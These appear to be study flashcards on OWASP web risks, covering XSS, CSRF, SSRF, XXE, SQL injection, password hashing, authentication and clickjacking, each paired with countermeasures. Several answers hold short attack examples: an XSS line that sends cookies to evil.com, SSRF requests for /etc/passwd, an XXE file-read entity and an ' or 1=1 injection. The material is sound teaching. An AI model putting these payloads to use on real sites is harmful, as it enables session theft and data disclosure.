OWASP part 2

Question 1

Exam question:
Which security guiding principle is related to the blacklisting countermeasure?

Answer 1

Be reluctant to trust

Question 2

Exam question:
Which security guiding principles are related to the encrypt sensitive information countermeasure?

Answer 2

Remember that hiding secrets are hard

Question 3

What is the security issue of cookie-based tokens?

Answer 3

The server can only see the cookie name and value, not from which domain it was sent.

Only sees:
Cookie: NAME=VALUE

Question 4

Fill in the black: All input is ___

Answer 4

Evil

Question 5

Which vulnerability is related to session fixation attack?

Answer 5

When servers escalates anonymous session tokens without changing their value.

Question 6

What can an attacker achieve with SQLi?

Answer 6

Modification/destruction of data

Unautherized access to data, steal information

Privilege escalation

Expose database structure

DoS

Question 7

What are possible countermeasures against SQLi?

Answer 7

Prepared statements, bind variables
Mitigating impact

Not recommended to only do:
- escape
- blacklist
- whitelist

Question 8

What does it mean to bind variables when mitigating SQLis?

Answer 8

To put one or more placeholders in the text of the SQL statement, then specify the variable (value to be used) for each placeholder.

Question 9

What are the 8 most common OWASP risk at this point in time?

Answer 9

More injection attacks - XSS

Broken access control - CSRF

SSRF

Security misconfiguration - XML external identities

SW and data integrity failures - insecure deserialization

Identification and auth failure - Broken authentication

Security logging and monitoring failures - insufficient logging and monitoring

HTML security issues - Clickjacking

Question 10

What type of session management attacks can be achieved using XSS?

Answer 10

Session token theft

Session fixation

Question 11

What is XSS?

Answer 11

Can occur when JS code is sent as user input and the server does not sanitize the input and echo’s it directly on the html page. This way, the user input will be interpreted as code and executed.

Question 12

How can XSS be used to steal tokens? (Token theft)

Answer 12

An attacker finds out that http://example.com/query? is vulnerable to XSS.

The attacker knows that user A uses this page alot.

The attacker sends the following link to the user:
http://example.com/query?name=

new Image().src = "http://evil.com/log?c='+document.cookie;

The attacker lures the user to click this link

When the user clicks the link, the script is echoed back to the user’s browser and executed. The user’s anonymous or logged-in cookie at example.com is logged at evil.com

Question 13

How can XSS be used in session fixation attacks?

Answer 13

The attacker sends a request to example.com and receives back an anonymous token from the server.

At the same time, A visits the same site and receives their own anonymous cookie.

Then, the attacker sends the link to A:
http://example.com/query?name=

document.cookie = "exampleSiteToken=attackersToken"

Attacker lures A to click this link

Later, A logs in to the example.com site. If the credentials are valid, the server escalated the anonymous token, with the attackers value, to a logged-in token.

The attacker can now use their token to impersonate A.

Question 14

What are some usual sources of untrusted input?

Answer 14

Query

User/profile page

Forum/Message board

Blogs

Question 15

What are the 2 types of XSS attacks?

Answer 15

Reflected XSS

Stored XSS

Question 16

What is reflected XSS?

Answer 16

JS is injected into a request

The JS code is reflected immediately in the response

Question 17

What is stored XSS?

Answer 17

Script injected into a request, then stored somewhere on the server.
Reflected repeatedly, making it more easily spread.

Question 18

How can XSS be mitigated?

Answer 18

Sanitize input data
Sanitize or escape data that is inserted into a web page.

Don’t rely on sanitizing only on the client side, as requests can be intercepted. Always sanitize on the server side as well.

Question 19

What is the flow of CSRF?

Answer 19

User logs in and gets a session ID from the server:
Cookie: sessionID=1234

The user has this session open, when visiting a new site: evil.com

This site contains an image, that is not a real image, but rather refers to a transfer site of the bank
<img></img>

When the image is reflected back to the browser, the link is executed, effectively sending a request on behalf of the user. The session ID of the user is used to complete the transaction.

The attacker needs to understand how transaction requests are made from the banking app, to be able to forge a correct request.

Question 20

What is the vulnerability that makes CSRFs possible?

Answer 20

Session management that only relies on a cookie. And the server is not able to distinguish between real and forged requests.

Question 21

How can you identify if a website is vulnerable to CSRF?

Answer 21

Identify URL to test for CSRF. For example test if you are able to delete an account on a website using csrf.

Set up different website that contains:
<img src=”http://example.com/account/del”

Create a dummy account on the original website, and log in.

With the session active, open the HTML page we just created in the same browser.

If the account was deleted -> is vulnerable

Question 22

How can CSRF be mitigated? (4)

Answer 22

Extra authentication when doing transactions: re-authenticate

CSRF tokens(action tokens)

SameSite cookies (browser setting): Prevents cross-site cookie usage

Referer-based validation: Verifies that the request originates from own domain.

Question 23

How can we mitigate CSRF using CSRF tokens?

Answer 23

Combine tokens in the cookie and the hidden-form field. Add action token as hidden field to genuine forms. This token should not be predictable.

When a user logs in it gets a sessionID. When the user asks for the transfer form, a CSRF token is created and put in a hidden field. The form is then returned to the user.

Whenever a user issues a request from the form, both the cookie and the CSRF token are sent. The server checks both.

Question 23

What is SSRF?

Answer 23

A browser is talking to a web app that is in a trust zone with other servers or services. The server can access backend services.

The attacker sends a request to the server, which is then forwarded within the trusted zone. This request executes with the rights of the web server.

Question 24

Give 2 examples of SSRF requests

Answer 24

GET /?url=http://127.0.0.1/admin/

GET /?url=file:///etc/passwd

Question 25

How can SSRF be countermeasured?

Answer 25

There is no universal fix, as it depends on the server-side implementation (application functionality and business requirements).

Some approaches:
- Whitelisting on server side (What IP addresses can pass through)
- Handle responses from the server: e.g. make sure not to send files or passwords
- Authentication between server and internal services
- Network segregation

Question 26

What is XML External Entities in regards to security misconfigurations?

Answer 26

When we have code that requires an XML parser.

<!ENTITY name SYSTEM “URI”>
!ENTITY: External entity declaration, name of the external entity
SYSTEM: Private/local
URI: Location of the variable

External entities refers to things that are used often in multiple documents in different parts of code. Used so that the same information does not need to be fetched multiple times from the different places.

Question 27

Describe XML External Entities (XXE) attacks

Answer 27

Attack where an attacker uses malicious XML input that references an external entity that is processed by a weakly configures XML parser.

Normal input:
Input: <test>Hello</test>
Output after XML parsing: Hello

Malicious:
Input:
<!DOCTYPE test [!ENTITY xxefile SYSTEM “file://etc/passwd”>]><test>&xxefile</test>
Output:
Content of passwd file

Question 28

How can XEE be countermeasured?

Answer 28

Disable processing/parsing of XML external entities and DTD (Document Type Definition)

Use safe parsing libraries, or defused parsing.

Question 29

Describe Insecure deserialization in regards to Software and data integrity failures

Answer 29

Attacker can tamper with network data and inject malicious payload in a serialized data stream, e.g. SQLi payload.

Data stream:
{“ID”: “ user1’ or 1=1”, “Course”:”4237”, “Grade”: “C”}

Server-side code:
“SELECT Grade FROM student WHERE user=”user 1’ or 1=1”

Question 30

How can insecure serialization be countermeasured?

Answer 30

Don’t accept serialized objects from untrusted sources.

Integrity checks: e.g. digital signatures on serialized objects

Isolate and run code that serializes in low privilege environments

Use JSON: data-only serialization format.

Question 31

What is the difference between identification and authentication?

Answer 31

Identification: An entity telling who they are

Authentication: An entity proving/verifying that they are the identity they claim to be

Question 32

How can authentication be done?

Answer 32

3 ways:
- Something you know
- Something you have
- Something you are

Question 33

How can “Something you know” be implemented, and what are the advantages/disadvantages

Answer 33

Password, security questions

Pros:
- Simple to implement, understand and use

Cons:
- Easy to crack, and forget

Question 34

How can “Something you have” be implemented, and what are the advantages/disadvantages

Answer 34

BankID, mobile phone (1 time password)

Pros:
- Hard to crack, as long as not lost

Cons:
- Thing can be broken, stolen or forged
- If loose phone - won’t be able to get a 1TP for a while
– Strength of auth depends on the difficulty of forging

Question 35

How can “Something you are” be implemented, and what are the advantages/disadvantages

Answer 35

Biometrics: fingerprint, palm scan, facial recognition, usage patterns, signature dynamics

Pros:
- Hard to crack
- Hard to steal (?): We leave our biometrics everywhere: fingerprints are not so hard to steal anymore, recorded voices/faces can be used to forge voice or facial recognition

Cons:
- Accuracy: False negative/False positives
- Social acceptance and privacy issues
- Key management
- Hard to replace

Question 36

How can passwords be cracked?

Answer 36

Vulnerable password storage:
Passwords are often stored on files with the following format. If an attacker gets the file, all users are comprimized.
Username:password

Question 37

What is a countermeasure against password cracking?

Answer 37

Hashing: Stored hashed version of the password, not the plaintext version

In storage:
username: 923786t8732kdsbhy77832bwd11k

Question 38

Why shouldn’t the client hash the password?

Answer 38

If someone gets access to the hash database, they can use the hash to enter the database from the client. The server would not be able to distinguish between the hash and the entries in the database.

Never trust the client. So do other security measures to protect the password in transit, rather than hashing.

Question 39

How can hashed passwords be attacked?

Answer 39

Dictionary attacks:
- Precompute the hash of a long list of common passwords (people tend to use the same passwords)
- Compare what is in the password file to these.
- This can be really quickly done offline when a password file is stored. Comparison can be run on a very fast computer.

Question 40

What is a good defence against dictionary attack?

Answer 40

Concatenate the password with a random salt:
password || 1212

Hash this

Store the hash with the salt:
username:bufeiwoiu23390234r67823:1212

Question 41

When is salting not a good defence against dictionary attacks?

Answer 41

Against offline attacks. When the attacker gets access to the password file where both the hashed password and the salt is used. Salt is stored in plaintext in the password file. This way the attacker can just use the salt they have found and run the same attacks.

Question 42

When is salting a good defence against dictionary attacks?

Answer 42

Against online attacks, where an attacker does not have access to the record containing the salt (file or db record).

Question 43

Why do we store the salt in plaintext, and not a hashed version?

Answer 43

You need the original salt to compare the password with the stored hashed version of the password.

Question 44

What is a rainbow table?

Answer 44

The precomputed hash tables of common passwords

Question 45

Why is dictionary attacks not as efficient when using a salt?

Answer 45

Need to compute a rainbow table for every salt.

Question 46

How can we make hashed passwords even more secure?

Answer 46

Using a pepper.

A pepper is a secure value that is appended to the password before it is hashed. Unlike salts, the pepper is the same for every user and is not saved in the password file. The pepper is stored in an encrypted form in another secure place.

hash(password || pepper|| salt)

Question 47

What are the benefits of using peppers in password storage?

Answer 47

Makes the password longer and more complex.

Defend against offline attacks better:
- pepper is stored encrypted in another location
- If the attacker steals the password file, the pepper is still unknown

Question 48

Why is still additional password security required, besides salt and pepper?

Answer 48

Dictionary attacks are still possible, just requires more computing power

Question 49

What are some additional password security techinques?

Answer 49

Combine password security with other authentication countermeasures such as:
- Filtering
- Limiting the number of logins
- Aging password
- 2FA or multichannel auth
- Last login/protective monitoring
- 1 time password

Question 50

What is password filtering

Answer 50

When creating a password, it must meet some minimum requirements.

Length, mix of characters, case

Measure the strength: weak, medium, strong

Question 51

What is Limiting the number of logins?

Answer 51

Lockout user after a certain number of login-trials

This is inconvenient to forgetful user

Question 52

What attack can be done on a system that limits the number of logins?

Answer 52

DoS: Lockout legitimate users by attempting login until they are locked out

Question 53

What is login throttling?

Answer 53

Each time login fails, the user must wait a longer time to try again. Inconvenient, but prevents users from being locked out

Question 54

What is last login/protective monitoring?

Answer 54

Notify users of suspicious login (login date, time, location)

Educate users to pay attention

Educate users to report possible attacks

Question 55

What are aging passwords?

Answer 55

Policy that requires users to change passwords every now and then.

Cons:
- People tend to forget passwords more often
- Users find workarounds: repeat passwords, incrementing, easy to guess adjustments

Question 56

What are one-time passwords?

Answer 56

Login with different password each time

Through SMS or device (e.g. bankID)

Work as long as the user has access to the devie

Question 57

What is 2FA, two-channel

Answer 57

Combines 2 or more ways of authentication

Often:
password + 1 time passwords
password + bankID

Question 58

What is a common password attack vector?

Answer 58

Go through the forgot-password functionality. As a developer, need to think about how this process can be made safe

Question 59

What are some common ways of doing password recovery?

Answer 59

URL tokens: Expiration date is important

PINs

Offline methods: e.g. show up at office to confirm password

Security questions (not a good idea, a lot of these information is available to the public)

Question 60

What is the tradeoffs in authentication?

Answer 60

Authentication security and usability

Question 61

What is CAPTCHA and reCAPTCHA

Answer 61

Completely Automated Public Turing test to tell Computers and Humans Apart

Used to block bots. Machines are not good at solving captchas, but are getting better with machine learning.

Question 62

Name 6 authentication and password test cases

Answer 62

Testing vulnerable remember password

Testing for browser cache weakness

Testing for weak password policy

Testing for weak security question/answer

Testing for weak password change or reset functionality

Testing for waker auth in alternative channel

Question 63

What is Insufficient logging and monitoring, in regards to security logging and monitoring?

Answer 63

Typical vulnerabilities: logins, failed logins, high-value transactions are not logged at all

Warning and errors generate no, inadequate or unclear log messages

Logs are not monitored properly

Logs are only stored locally. This makes it easier for an attacker to wipe the logs, and makes it difficult to monitor the logs properly.

Appropriate alerting thresholds and response escalation processes are not in place or effective.

Need to have a real-time response. Systems are weak if they are unable to detect, escalate, or alert for active threats in real. time or near real time.

Question 64

What is Clickjacking in regards to HTML security issues?

Answer 64

When someone puts an invisible website on top of a website with legit content, as an iframe.
The user might think they are clicking on a button, when they actually are clicking on the iframe.

Use iframe and opacity

Top layer: What attacker wants you to click on, opacity 0
Bottom layer: What the user sees, opacity 1

Question 65

What are some countermeasures against click jacking?

Answer 65

“X-Frame-Options: deny” Use this in the header of the legit site, this completely disables the loading of the page in a frame